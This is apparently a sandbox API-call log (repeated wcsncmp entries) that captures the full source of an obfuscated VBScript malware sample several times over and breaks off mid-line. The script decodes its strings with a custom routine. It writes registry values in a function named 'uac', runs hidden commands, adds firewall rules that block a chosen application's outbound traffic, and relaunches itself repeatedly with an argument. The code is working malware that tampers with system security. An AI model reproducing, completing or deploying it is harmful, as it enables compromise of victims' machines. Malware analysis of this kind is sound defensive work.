If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 76 [0226.285] wcsncmp (_String1="\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.285] wcsncmp (_String1="sdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.285] wcsncmp (_String1="dfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0226.285] wcsncmp (_String1="fheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = 